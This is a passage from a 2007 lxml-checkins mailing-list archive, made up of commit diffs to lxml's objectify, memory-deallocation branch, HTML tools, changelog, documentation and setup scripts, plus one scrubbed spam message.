None: + text = old + text + cetree.setNodeText(elem._c_node, text) + +E = ElementMaker() + cdef object _DEFAULT_NSMAP _DEFAULT_NSMAP = { "py" : PYTYPE_NAMESPACE, "xsi" : XML_SCHEMA_INSTANCE_NS, From scoder at codespeak.net Mon Jun 25 22:18:57 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Mon, 25 Jun 2007 22:18:57 +0200 (CEST) Subject: [Lxml-checkins] r44529 - in lxml/trunk: doc src/lxml Message-ID: <20070625201857.7CF6180D1@code0.codespeak.net> Author: scoder Date: Mon Jun 25 22:18:57 2007 New Revision: 44529 Modified: lxml/trunk/doc/objectify.txt lxml/trunk/src/lxml/objectify.pyx Log: support more data types on objectify.E Modified: lxml/trunk/doc/objectify.txt ============================================================================== --- lxml/trunk/doc/objectify.txt (original) +++ lxml/trunk/doc/objectify.txt Mon Jun 25 22:18:57 2007 @@ -274,14 +274,18 @@ >>> E = objectify.E >>> root = E.root( - ... E.a("5"), - ... E.b("6") + ... E.a(5), + ... E.b(6.1), + ... E.c(True), + ... E.d("how") ... 
) >>> print etree.tostring(root, pretty_print=True) 5 - 6 + 6.1 + true + how Modified: lxml/trunk/src/lxml/objectify.pyx ============================================================================== --- lxml/trunk/src/lxml/objectify.pyx (original) +++ lxml/trunk/src/lxml/objectify.pyx Mon Jun 25 22:18:57 2007 @@ -1857,11 +1857,19 @@ typemap[__builtin__.str] = __add_text typemap[__builtin__.unicode] = __add_text + typemap[__builtin__.int] = __add_text + typemap[__builtin__.long] = __add_text + typemap[__builtin__.float] = __add_text + typemap[__builtin__.bool] = __add_text _ElementMaker.__init__(self, typemap, objectify_parser.makeelement) -def __add_text(cetree._Element elem not None, text): +def __add_text(_Element elem not None, text): cdef tree.xmlNode* c_child + if isinstance(text, bool): + text = str(text).lower() + else: + text = str(text) c_child = cetree.findChildBackwards(elem._c_node, 0) if c_child is not NULL: old = cetree.tailOf(c_child) From scoder at codespeak.net Tue Jun 26 15:00:01 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 26 Jun 2007 15:00:01 +0200 (CEST) Subject: [Lxml-checkins] r44544 - lxml/branch/proxy-dealloc/src/lxml Message-ID: <20070626130001.7921980D7@code0.codespeak.net> Author: scoder Date: Tue Jun 26 15:00:01 2007 New Revision: 44544 Modified: lxml/branch/proxy-dealloc/src/lxml/apihelpers.pxi lxml/branch/proxy-dealloc/src/lxml/etree.pyx lxml/branch/proxy-dealloc/src/lxml/proxy.pxi Log: trial version that stores pointers to disconnected tree fragments in the document (not working yet) Modified: lxml/branch/proxy-dealloc/src/lxml/apihelpers.pxi ============================================================================== --- lxml/branch/proxy-dealloc/src/lxml/apihelpers.pxi (original) +++ lxml/branch/proxy-dealloc/src/lxml/apihelpers.pxi Tue Jun 26 15:00:01 2007 @@ -98,6 +98,7 @@ If 'c_doc' is also NULL, a new xmlDoc will be created. 
""" cdef xmlNode* c_node + cdef _Element element ns_utf, name_utf = _getNsTag(tag) if doc is not None: c_doc = doc._c_doc @@ -115,7 +116,9 @@ # add namespaces to node if necessary doc._setNodeNamespaces(c_node, ns_utf, nsmap) _initNodeAttributes(c_node, doc, attrib, extra_attrs) - return _elementFactory(doc, c_node) + element = _elementFactory(doc, c_node) + _markNodeDisconnected(doc, c_node) + return element except: # free allocated c_node/c_doc unless Python does it for us if c_node.doc is not c_doc: @@ -482,11 +485,12 @@ else: return 0 -cdef void _removeNode(xmlNode* c_node): +cdef void _removeNode(_Document doc, xmlNode* c_node): """Unlink and free a node and subnodes if possible. """ tree.xmlUnlinkNode(c_node) - attemptDeallocation(c_node) + if not attemptDeallocation(c_node): + _markNodeDisconnected(doc, c_node) cdef void _moveTail(xmlNode* c_tail, xmlNode* c_target): cdef xmlNode* c_next @@ -514,7 +518,8 @@ c_target = c_new_tail c_tail = _textNodeOrSkip(c_tail.next) -cdef xmlNode* _deleteSlice(xmlNode* c_node, Py_ssize_t start, Py_ssize_t stop): +cdef xmlNode* _deleteSlice(_Document doc, xmlNode* c_node, + Py_ssize_t start, Py_ssize_t stop): """Delete slice, starting with c_node, start counting at start, end at stop. 
""" cdef xmlNode* c_next @@ -528,7 +533,7 @@ if _isElement(c_node): _removeText(c_node.next) c_next = c_node.next - _removeNode(c_node) + _removeNode(doc, c_node) c = c + 1 c_node = c_next return c_node Modified: lxml/branch/proxy-dealloc/src/lxml/etree.pyx ============================================================================== --- lxml/branch/proxy-dealloc/src/lxml/etree.pyx (original) +++ lxml/branch/proxy-dealloc/src/lxml/etree.pyx Tue Jun 26 15:00:01 2007 @@ -233,8 +233,11 @@ """ cdef int _ns_counter cdef xmlDoc* _c_doc + cdef xmlNode** _disconnected_nodes + cdef cstd.size_t _disconnected_nodes_count + cdef cstd.size_t _disconnected_nodes_max cdef _BaseParser _parser - + def __dealloc__(self): # if there are no more references to the document, it is safe # to clean the whole thing up, as all nodes have a reference to @@ -244,7 +247,8 @@ #print self._c_doc, self._c_doc.dict is __GLOBAL_PARSER_CONTEXT._c_dict #print self._c_doc, canDeallocateChildNodes(self._c_doc) #tree.xmlFreeDoc(c_doc) - _deallocDocument(self._c_doc) + #_deallocDocument(self._c_doc) + _deallocDocument(self) cdef getroot(self): cdef xmlNode* c_node @@ -371,10 +375,17 @@ if node_ns_utf is not None: self._setNodeNs(c_node, _cstr(node_ns_utf)) +cdef extern from "etree_defs.h": + # macro call to 't->tp_new()' for fast instantiation + cdef _Document NEW_DOCUMENT "PY_NEW" (object t) + cdef _Document _documentFactory(xmlDoc* c_doc, _BaseParser parser): cdef _Document result - result = _Document() + result = NEW_DOCUMENT(_Document) result._c_doc = c_doc + result._disconnected_nodes = NULL + result._disconnected_nodes_max = 0 + result._disconnected_nodes_count = 0 result._ns_counter = 0 if parser is None: parser = __GLOBAL_PARSER_CONTEXT.getDefaultParser() @@ -437,7 +448,7 @@ #displayNode(self._c_node, 0) if self._c_node is not NULL: unregisterProxy(self) - attemptDeallocation(self._c_node) + #attemptDeallocation(self._c_node) # MANIPULATORS @@ -464,14 +475,14 @@ if c_node is NULL: raise 
IndexError, index _removeText(c_node.next) - _removeNode(c_node) + _removeNode(self._doc, c_node) def __delslice__(self, Py_ssize_t start, Py_ssize_t stop): """Deletes a number of subelements. """ cdef xmlNode* c_node c_node = _findChild(self._c_node, start) - _deleteSlice(c_node, start, stop) + _deleteSlice(self._doc, c_node, start, stop) def __setslice__(self, Py_ssize_t start, Py_ssize_t stop, value): """Replaces a number of subelements with elements @@ -487,7 +498,7 @@ c_node = _findChild(self._c_node, start) # now delete the slice if start != stop: - c_node = _deleteSlice(c_node, start, stop) + c_node = _deleteSlice(self._doc, c_node, start, stop) # if the insertion point is at the end, append there if c_node is NULL: for element in value: @@ -599,7 +610,7 @@ if _isElement(c_node): _removeText(c_node_next) c_node_next = c_node.next - _removeNode(c_node) + _removeNode(self._doc, c_node) c_node = c_node_next def insert(self, index, _Element element not None): Modified: lxml/branch/proxy-dealloc/src/lxml/proxy.pxi ============================================================================== --- lxml/branch/proxy-dealloc/src/lxml/proxy.pxi (original) +++ lxml/branch/proxy-dealloc/src/lxml/proxy.pxi Tue Jun 26 15:00:01 2007 @@ -112,22 +112,120 @@ c_new_ns = c_new_ns.next c_parent = c_parent.parent + +################################################################################ +# list of xmlNodes that were taken out of a document + +cdef int _markNodeDisconnected(_Document doc, xmlNode* c_node) except -1: + cdef xmlNode** c_elements + cdef cstd.size_t i + if doc._disconnected_nodes is NULL: + doc._disconnected_nodes = \ + python.PyMem_Malloc(sizeof(xmlNode*) * 20) + doc._disconnected_nodes_max = 20 + doc._disconnected_nodes_count = 1 + doc._disconnected_nodes[0] = c_node + return 0 + + c_elements = doc._disconnected_nodes + for i from 0 <= i < doc._disconnected_nodes_count: + if c_elements[0] is c_node: + # already there + return 0 + c_elements = c_elements + 1 
+ + if doc._disconnected_nodes_count == doc._disconnected_nodes_max: + doc._disconnected_nodes_max = doc._disconnected_nodes_max * 2 + c_elements = python.PyMem_Realloc( + doc._disconnected_nodes, + sizeof(xmlNode*) * doc._disconnected_nodes_max) + if c_elements is NULL: + python.PyErr_NoMemory() + + doc._disconnected_nodes[doc._disconnected_nodes_count] = c_node + doc._disconnected_nodes_count = doc._disconnected_nodes_count + 1 + return 0 + +cdef void _markNodeNotDisconnected(_Document doc, xmlNode* c_node): + cdef xmlNode** c_elements + cdef xmlNode** c_end + if doc._disconnected_nodes_count == 0: + return + + c_elements = doc._disconnected_nodes + c_end = c_elements + doc._disconnected_nodes_count + while c_elements[0] is not c_node: + c_elements = c_elements + 1 + if c_elements is c_end: + # not found + return + + doc._disconnected_nodes_count = doc._disconnected_nodes_count - 1 + while c_elements is not c_end: + c_elements[0] = c_elements[1] + c_elements = c_elements + 1 + +cdef int _deallocDocument(_Document doc) except -1: + """We cannot rely on Python's GC to *always* dealloc the _Document *after* + all proxies it contains => run through all elements that were removed from + the tree structure and free their top nodes. Then, free the document + itself, i.e. the connected tree. 
+ """ + cdef xmlNode* c_node + cdef xmlNode* c_root_node + cdef xmlNode** c_elements + cdef xmlNode** c_roots + cdef xmlNode** c_node_pos + cdef cstd.size_t i,t + # find real tree roots and make sure we only have those once + c_elements = doc._disconnected_nodes + for i from 0 <= i < doc._disconnected_nodes_count: + c_node = c_elements[i] + while c_node.parent is not NULL: + c_node = c_node.parent + if c_node is doc._c_doc: + c_elements[i] = NULL + else: + assert _isElement(c_node) + for t from 0 <= t < i: + if c_elements[t] is c_node: + c_elements[i] = NULL + break + else: + c_root_node = c_node + tree.BEGIN_FOR_EACH_ELEMENT_FROM(c_root_node, c_node, 1) + if c_node._private is not NULL: + (<_Element>c_node._private)._c_node = NULL + tree.END_FOR_EACH_ELEMENT_FROM(c_node) + c_elements[i] = c_root_node + tree.xmlFreeNode(c_root_node) + + # then, free the connected part of the document + tree.xmlFreeDoc(doc._c_doc) + + if doc._disconnected_nodes is not NULL: + python.PyMem_Free(doc._disconnected_nodes) + doc._disconnected_nodes = NULL + doc._disconnected_nodes_count = 0 + ################################################################################ # support for freeing tree elements when proxy objects are destroyed -cdef void attemptDeallocation(xmlNode* c_node): +cdef int attemptDeallocation(xmlNode* c_node): """Attempt deallocation of c_node (or higher up in tree). """ cdef xmlNode* c_top # could be we actually aren't referring to the tree at all if c_node is NULL: #print "not freeing, node is NULL" - return + return 0 c_top = getDeallocationTop(c_node) if c_top is not NULL: #print "freeing:", c_top.name _removeText(c_top.next) # tail tree.xmlFreeNode(c_top) + return 1 + return 0 cdef xmlNode* getDeallocationTop(xmlNode* c_node): """Return the top of the tree that can be deallocated, or NULL. 
@@ -167,7 +265,7 @@ tree.END_FOR_EACH_ELEMENT_FROM(c_node) return 1 -cdef void _deallocDocument(xmlDoc* c_doc): +cdef void XXX_deallocDocument(xmlDoc* c_doc): """We cannot rely on Python's GC to *always* dealloc the _Document *after* all proxies it contains => traverse the document and mark all its proxies as dead by deleting their xmlNode* reference. @@ -200,6 +298,7 @@ cdef xmlNs* c_del_ns cdef xmlNs* c_last_del_ns cdef cstd.size_t i, c_cache_size, c_cache_last + cdef _Element current_element c_element = node._c_node c_doc = c_element.doc @@ -207,6 +306,8 @@ if not tree._isElementOrXInclude(c_element): return + _markNodeNotDisconnected(node._doc, c_element) + c_start_node = c_element c_ns_new_cache = NULL c_ns_old_cache = NULL @@ -300,7 +401,9 @@ # fix _Document reference (may dealloc the original document!) if c_element._private is not NULL: - (<_Element>c_element._private)._doc = doc + current_element = <_Element>c_element._private + _markNodeNotDisconnected(current_element._doc, c_element) + current_element._doc = doc if c_element is c_start_node: break @@ -318,7 +421,9 @@ # fix _Document reference (may dealloc the original document!) if c_element._private is not NULL: - (<_Element>c_element._private)._doc = doc + current_element = <_Element>c_element._private + _markNodeNotDisconnected(current_element._doc, c_element) + current_element._doc = doc if c_element is c_start_node: break From lxml-checkins at codespeak.net Tue Jun 26 18:51:28 2007 From: lxml-checkins at codespeak.net (lxml-checkins at codespeak.net) Date: Tue, 26 Jun 2007 18:51:28 +0200 (CEST) Subject: [Lxml-checkins] Additional savings on clearance - up to 80% off! Message-ID: <20070626055439.10696.qmail@og8882-1.nwol.net> An HTML attachment was scrubbed... 
URL: http://codespeak.net/pipermail/lxml-checkins/attachments/20070626/d6bae706/attachment.htm From ianb at codespeak.net Tue Jun 26 23:08:05 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Tue, 26 Jun 2007 23:08:05 +0200 (CEST) Subject: [Lxml-checkins] r44553 - lxml/branch/html/src/lxml/html/tests Message-ID: <20070626210805.27D3E80FC@code0.codespeak.net> Author: ianb Date: Tue Jun 26 23:08:03 2007 New Revision: 44553 Modified: lxml/branch/html/src/lxml/html/tests/test_autolink.txt Log: added some (already passing) tests for linking Modified: lxml/branch/html/src/lxml/html/tests/test_autolink.txt ============================================================================== --- lxml/branch/html/src/lxml/html/tests/test_autolink.txt (original) +++ lxml/branch/html/src/lxml/html/tests/test_autolink.txt Tue Jun 26 23:08:03 2007 @@ -16,6 +16,12 @@ ... the http://foobar.com links.''')
The great thing is the http://link.com links and the http://foobar.com links.
+ >>> print autolink_html(''' + ...
Link: <http://foobar.com>
''') + + >>> print autolink_html(''' + ...
Link: (http://foobar.com)
''') + Some cases that won't be caught (on purpose):: From ianb at codespeak.net Wed Jun 27 00:59:13 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Wed, 27 Jun 2007 00:59:13 +0200 (CEST) Subject: [Lxml-checkins] r44555 - lxml/branch/html/src/lxml/html Message-ID: <20070626225913.BF5DC80FA@code0.codespeak.net> Author: ianb Date: Wed Jun 27 00:59:12 2007 New Revision: 44555 Modified: lxml/branch/html/src/lxml/html/formfill.py Log: put all public objects in __all__ Modified: lxml/branch/html/src/lxml/html/formfill.py ============================================================================== --- lxml/branch/html/src/lxml/html/formfill.py (original) +++ lxml/branch/html/src/lxml/html/formfill.py Wed Jun 27 00:59:12 2007 @@ -2,7 +2,9 @@ from lxml.html import parse, tostring from lxml.html import defs -__all__ = ['FormNotFound', 'fill_form'] +__all__ = ['FormNotFound', 'fill_form', 'fill_form_html', + 'insert_errors', 'insert_errors_html', + 'DefaultErrorCreator'] class FormNotFound(LookupError): """ From scoder at codespeak.net Wed Jun 27 22:54:40 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Wed, 27 Jun 2007 22:54:40 +0200 (CEST) Subject: [Lxml-checkins] r44567 - in lxml/trunk: . 
src/lxml Message-ID: <20070627205440.29ED08110@code0.codespeak.net> Author: scoder Date: Wed Jun 27 22:54:38 2007 New Revision: 44567 Modified: lxml/trunk/CHANGES.txt lxml/trunk/src/lxml/etree.pyx Log: refcounting bug in attrib.pop() Modified: lxml/trunk/CHANGES.txt ============================================================================== --- lxml/trunk/CHANGES.txt (original) +++ lxml/trunk/CHANGES.txt Wed Jun 27 22:54:38 2007 @@ -30,6 +30,8 @@ Bugs fixed ---------- +* Reference-counting bug in ``Element.attrib.pop()`` + * The XML parser did not report undefined entities as error * The text in exceptions raised by XML parsers, validators and XPath Modified: lxml/trunk/src/lxml/etree.pyx ============================================================================== --- lxml/trunk/src/lxml/etree.pyx (original) +++ lxml/trunk/src/lxml/etree.pyx Wed Jun 27 22:54:38 2007 @@ -1498,10 +1498,11 @@ if python.PyTuple_GET_SIZE(default) == 0: raise KeyError, key else: - return python.PyTuple_GET_ITEM(default, 0) + result = python.PyTuple_GET_ITEM(default, 0) + python.Py_INCREF(result) else: _delAttribute(self._element, key) - return result + return result def clear(self): cdef xmlNode* c_node From scoder at codespeak.net Wed Jun 27 22:55:57 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Wed, 27 Jun 2007 22:55:57 +0200 (CEST) Subject: [Lxml-checkins] r44568 - in lxml/branch/lxml-1.3: . 
src/lxml Message-ID: <20070627205557.078C2810A@code0.codespeak.net> Author: scoder Date: Wed Jun 27 22:55:57 2007 New Revision: 44568 Modified: lxml/branch/lxml-1.3/CHANGES.txt lxml/branch/lxml-1.3/src/lxml/etree.pyx Log: refcounting bug in attrib.pop() Modified: lxml/branch/lxml-1.3/CHANGES.txt ============================================================================== --- lxml/branch/lxml-1.3/CHANGES.txt (original) +++ lxml/branch/lxml-1.3/CHANGES.txt Wed Jun 27 22:55:57 2007 @@ -2,6 +2,18 @@ lxml changelog ============== +Under development +================= + +Features added +-------------- + +Bugs fixed +---------- + +* Reference-counting bug in ``Element.attrib.pop()`` + + 1.3 (2007-06-24) ================ Modified: lxml/branch/lxml-1.3/src/lxml/etree.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/etree.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/etree.pyx Wed Jun 27 22:55:57 2007 @@ -1480,10 +1480,11 @@ if python.PyTuple_GET_SIZE(default) == 0: raise KeyError, key else: - return python.PyTuple_GET_ITEM(default, 0) + result = python.PyTuple_GET_ITEM(default, 0) + python.Py_INCREF(result) else: _delAttribute(self._element, key) - return result + return result def clear(self): cdef xmlNode* c_node From scoder at codespeak.net Wed Jun 27 22:56:21 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Wed, 27 Jun 2007 22:56:21 +0200 (CEST) Subject: [Lxml-checkins] r44569 - lxml/trunk/doc Message-ID: <20070627205621.7A266810A@code0.codespeak.net> Author: scoder Date: Wed Jun 27 22:56:21 2007 New Revision: 44569 Modified: lxml/trunk/doc/objectify.txt Log: small extension to doctest Modified: lxml/trunk/doc/objectify.txt ============================================================================== --- lxml/trunk/doc/objectify.txt (original) +++ lxml/trunk/doc/objectify.txt Wed Jun 27 22:56:21 2007 @@ -277,7 +277,7 @@ ... E.a(5), ... E.b(6.1), ... E.c(True), - ... 
E.d("how") + ... E.d("how", tell="me") ... ) >>> print etree.tostring(root, pretty_print=True) @@ -285,11 +285,10 @@ 5 6.1 true - how + how - Namespace handling ------------------ From scoder at codespeak.net Thu Jun 28 15:04:46 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Thu, 28 Jun 2007 15:04:46 +0200 (CEST) Subject: [Lxml-checkins] r44596 - lxml/trunk/doc Message-ID: <20070628130446.598818101@code0.codespeak.net> Author: scoder Date: Thu Jun 28 15:04:45 2007 New Revision: 44596 Modified: lxml/trunk/doc/performance.txt Log: clarification in performance.txt Modified: lxml/trunk/doc/performance.txt ============================================================================== --- lxml/trunk/doc/performance.txt (original) +++ lxml/trunk/doc/performance.txt Thu Jun 28 15:04:45 2007 @@ -466,8 +466,11 @@ Since then, lxml has matured a lot and has gotten much faster. The iterparse variant now runs in 0.14 seconds, and if you remove the ``v.clear()``, it is -even a little faster (which isn't the case for cElementTree). When you move -the whole thing to a pure XPath implementation, it will look like this:: +even a little faster (which isn't the case for cElementTree). + +One of the many great tools in lxml is XPath, a swiss army knife for finding +things in XML documents. It is possible to move the whole thing to a pure +XPath implementation, which looks like this:: def bench_lxml_xpath_all(): tree = etree.parse("ot.xml") @@ -523,6 +526,11 @@ started with ``getiterator("v")`` or ``iterparse()``. Either of them would already have been the most efficient, depending on which library is used. +* It's important to know your tool. lxml and cElementTree are both very fast + libraries, but they do not have the same performance characteristics. The + fastest solution in one library can be comparatively slow in the other. If + you optimise, optimise for the specific target platform. + * It's not always worth optimising. 
After all that hassle we got from 0.12 seconds for the initial implementation to 0.11 seconds. Switching over to cElementTree and writing an ``iterparse()`` based version would have given From scoder at codespeak.net Thu Jun 28 15:05:12 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Thu, 28 Jun 2007 15:05:12 +0200 (CEST) Subject: [Lxml-checkins] r44597 - lxml/branch/lxml-1.3/doc Message-ID: <20070628130512.51B528101@code0.codespeak.net> Author: scoder Date: Thu Jun 28 15:05:12 2007 New Revision: 44597 Modified: lxml/branch/lxml-1.3/doc/performance.txt Log: doc update from trunk Modified: lxml/branch/lxml-1.3/doc/performance.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/performance.txt (original) +++ lxml/branch/lxml-1.3/doc/performance.txt Thu Jun 28 15:05:12 2007 @@ -474,8 +474,11 @@ Since then, lxml has matured a lot and has gotten much faster. The iterparse variant now runs in 0.14 seconds, and if you remove the ``v.clear()``, it is -even a little faster (which isn't the case for cElementTree). When you move -the whole thing to a pure XPath implementation, it will look like this:: +even a little faster (which isn't the case for cElementTree). + +One of the many great tools in lxml is XPath, a swiss army knife for finding +things in XML documents. It is possible to move the whole thing to a pure +XPath implementation, which looks like this:: def bench_lxml_xpath_all(): tree = etree.parse("ot.xml") @@ -531,6 +534,11 @@ started with ``getiterator("v")`` or ``iterparse()``. Either of them would already have been the most efficient, depending on which library is used. +* It's important to know your tool. lxml and cElementTree are both very fast + libraries, but they do not have the same performance characteristics. The + fastest solution in one library can be comparatively slow in the other. If + you optimise, optimise for the specific target platform. 
+ * It's not always worth optimising. After all that hassle we got from 0.12 seconds for the initial implementation to 0.11 seconds. Switching over to cElementTree and writing an ``iterparse()`` based version would have given From scoder at codespeak.net Fri Jun 29 10:28:24 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 29 Jun 2007 10:28:24 +0200 (CEST) Subject: [Lxml-checkins] r44612 - lxml/trunk Message-ID: <20070629082824.C2C7480A9@code0.codespeak.net> Author: scoder Date: Fri Jun 29 10:28:23 2007 New Revision: 44612 Modified: lxml/trunk/setup.py lxml/trunk/setupinfo.py Log: build with distutils if setuptools are not installed Modified: lxml/trunk/setup.py ============================================================================== --- lxml/trunk/setup.py (original) +++ lxml/trunk/setup.py Fri Jun 29 10:28:23 2007 @@ -1,12 +1,21 @@ -from ez_setup import use_setuptools -use_setuptools(version="0.6c5") - -from setuptools import setup import sys, os -# need to insert this to python path so we're sure we can import -# versioninfo and setupinfo even if we start setup.py from another -# location (such as a buildout) +try: + try: + import pkg_resources + pkg_resources.require("setuptools>=0.6c5") + except pkg_resources.VersionConflict, e: + from ez_setup import use_setuptools + use_setuptools(version="0.6c5") + raise ImportError + from setuptools import setup +except ImportError: + # not setuptools installed + from distutils.core import setup + +# need to insert this to python path so we're sure we can import versioninfo, +# setupinfo and Pyrex (!) 
even if we start setup.py from another location +# (such as a buildout) sys.path.insert(0, os.path.dirname(__file__)) import versioninfo Modified: lxml/trunk/setupinfo.py ============================================================================== --- lxml/trunk/setupinfo.py (original) +++ lxml/trunk/setupinfo.py Fri Jun 29 10:28:23 2007 @@ -1,5 +1,8 @@ import sys, os -from setuptools.extension import Extension +try: + from setuptools.extension import Extension +except ImportError: + from distutils.extension import Extension try: from Pyrex.Distutils import build_ext as build_pyx From scoder at codespeak.net Fri Jun 29 10:28:46 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 29 Jun 2007 10:28:46 +0200 (CEST) Subject: [Lxml-checkins] r44613 - lxml/branch/lxml-1.3 Message-ID: <20070629082846.40CD380A9@code0.codespeak.net> Author: scoder Date: Fri Jun 29 10:28:45 2007 New Revision: 44613 Modified: lxml/branch/lxml-1.3/setup.py lxml/branch/lxml-1.3/setupinfo.py Log: build with distutils if setuptools are not installed Modified: lxml/branch/lxml-1.3/setup.py ============================================================================== --- lxml/branch/lxml-1.3/setup.py (original) +++ lxml/branch/lxml-1.3/setup.py Fri Jun 29 10:28:45 2007 @@ -1,12 +1,21 @@ -from ez_setup import use_setuptools -use_setuptools(version="0.6c5") - -from setuptools import setup import sys, os -# need to insert this to python path so we're sure we can import -# versioninfo and setupinfo even if we start setup.py from another -# location (such as a buildout) +try: + try: + import pkg_resources + pkg_resources.require("setuptools>=0.6c5") + except pkg_resources.VersionConflict, e: + from ez_setup import use_setuptools + use_setuptools(version="0.6c5") + raise ImportError + from setuptools import setup +except ImportError: + # not setuptools installed + from distutils.core import setup + +# need to insert this to python path so we're sure we can import versioninfo, +# 
setupinfo and Pyrex (!) even if we start setup.py from another location +# (such as a buildout) sys.path.insert(0, os.path.dirname(__file__)) import versioninfo Modified: lxml/branch/lxml-1.3/setupinfo.py ============================================================================== --- lxml/branch/lxml-1.3/setupinfo.py (original) +++ lxml/branch/lxml-1.3/setupinfo.py Fri Jun 29 10:28:45 2007 @@ -1,5 +1,8 @@ import sys, os -from setuptools.extension import Extension +try: + from setuptools.extension import Extension +except ImportError: + from distutils.extension import Extension try: from Pyrex.Distutils import build_ext as build_pyx From scoder at codespeak.net Fri Jun 29 10:30:09 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 29 Jun 2007 10:30:09 +0200 (CEST) Subject: [Lxml-checkins] r44614 - lxml/trunk/src/lxml Message-ID: <20070629083009.7836380A9@code0.codespeak.net> Author: scoder Date: Fri Jun 29 10:30:09 2007 New Revision: 44614 Modified: lxml/trunk/src/lxml/etree.pyx Log: cleanup Modified: lxml/trunk/src/lxml/etree.pyx ============================================================================== --- lxml/trunk/src/lxml/etree.pyx (original) +++ lxml/trunk/src/lxml/etree.pyx Fri Jun 29 10:30:09 2007 @@ -501,7 +501,6 @@ # store possible text tail c_next = element._c_node.next # now move node previous to insertion point - tree.xmlUnlinkNode(element._c_node) tree.xmlAddPrevSibling(c_node, element._c_node) # and move tail just behind his node _moveTail(c_next, element._c_node) @@ -630,6 +629,7 @@ c_next = element._c_node.next tree.xmlUnlinkNode(c_node) _moveTail(c_next, c_node) + # fix namespace declarations moveNodeToDocument(self._doc, c_node) def replace(self, _Element old_element not None, @@ -650,6 +650,8 @@ _moveTail(c_new_next, c_new_node) _moveTail(c_old_next, c_old_node) moveNodeToDocument(self._doc, c_new_node) + # fix namespace declarations + moveNodeToDocument(self._doc, c_old_node) # PROPERTIES property tag: From scoder at 
codespeak.net Fri Jun 29 10:30:30 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 29 Jun 2007 10:30:30 +0200 (CEST) Subject: [Lxml-checkins] r44615 - lxml/branch/lxml-1.3/src/lxml Message-ID: <20070629083030.03CDD80A9@code0.codespeak.net> Author: scoder Date: Fri Jun 29 10:30:30 2007 New Revision: 44615 Modified: lxml/branch/lxml-1.3/src/lxml/etree.pyx Log: merged in small cleanup from trunk Modified: lxml/branch/lxml-1.3/src/lxml/etree.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/etree.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/etree.pyx Fri Jun 29 10:30:30 2007 @@ -501,7 +501,6 @@ # store possible text tail c_next = element._c_node.next # now move node previous to insertion point - tree.xmlUnlinkNode(element._c_node) tree.xmlAddPrevSibling(c_node, element._c_node) # and move tail just behind his node _moveTail(c_next, element._c_node) @@ -630,6 +629,7 @@ c_next = element._c_node.next tree.xmlUnlinkNode(c_node) _moveTail(c_next, c_node) + # fix namespace declarations moveNodeToDocument(self._doc, c_node) def replace(self, _Element old_element not None, @@ -650,6 +650,8 @@ _moveTail(c_new_next, c_new_node) _moveTail(c_old_next, c_old_node) moveNodeToDocument(self._doc, c_new_node) + # fix namespace declarations + moveNodeToDocument(self._doc, c_old_node) # PROPERTIES property tag: From scoder at codespeak.net Fri Jun 29 10:51:30 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 29 Jun 2007 10:51:30 +0200 (CEST) Subject: [Lxml-checkins] r44616 - lxml/branch/html/src/lxml/html Message-ID: <20070629085130.7753380EC@code0.codespeak.net> Author: scoder Date: Fri Jun 29 10:51:28 2007 New Revision: 44616 Modified: lxml/branch/html/src/lxml/html/__init__.py Log: use getiterator() where appropriate Modified: lxml/branch/html/src/lxml/html/__init__.py ============================================================================== --- 
lxml/branch/html/src/lxml/html/__init__.py (original) +++ lxml/branch/html/src/lxml/html/__init__.py Fri Jun 29 10:51:28 2007 @@ -151,7 +151,7 @@ link you get is exactly the link in the document. """ link_attrs = defs.link_attrs - for el in _itertree(self): + for el in self.getiterator(): for attrib in link_attrs: if attrib in el.attrib: yield (el, attrib, el.attrib[attrib], 0) @@ -404,7 +404,7 @@ def _contains_block_level_tag(el): # FIXME: I could do this with XPath, but would that just be # unnecessarily slow? - for el in _itertree(el): + for el in el.getiterator(): if el.tag in defs.block_tags: return True return False @@ -417,16 +417,6 @@ else: return el.tag -# FIXME: should this be a method? It's convenient, but I can't find a -# method that does something like it. -def _itertree(el): - """ - Return the element's descendants, and the element itself - """ - yield el - for item in el.iterdescendants(): - yield item - def Element(*args, **kw): v = html_parser.makeelement(*args, **kw) return v From scoder at codespeak.net Fri Jun 29 18:49:37 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 29 Jun 2007 18:49:37 +0200 (CEST) Subject: [Lxml-checkins] r44620 - lxml/trunk/src/lxml Message-ID: <20070629164937.8A7D38118@code0.codespeak.net> Author: scoder Date: Fri Jun 29 18:49:36 2007 New Revision: 44620 Modified: lxml/trunk/src/lxml/iterparse.pxi Log: small cleanup Modified: lxml/trunk/src/lxml/iterparse.pxi ============================================================================== --- lxml/trunk/src/lxml/iterparse.pxi (original) +++ lxml/trunk/src/lxml/iterparse.pxi Fri Jun 29 18:49:36 2007 @@ -3,7 +3,7 @@ cdef object __ITERPARSE_CHUNK_SIZE __ITERPARSE_CHUNK_SIZE = 32768 -ctypedef enum IterparseEventFilter: +ctypedef enum _IterparseEventFilter: ITERPARSE_FILTER_START = 1 ITERPARSE_FILTER_END = 2 ITERPARSE_FILTER_START_NS = 4 From ianb at codespeak.net Fri Jun 29 18:51:58 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 29 
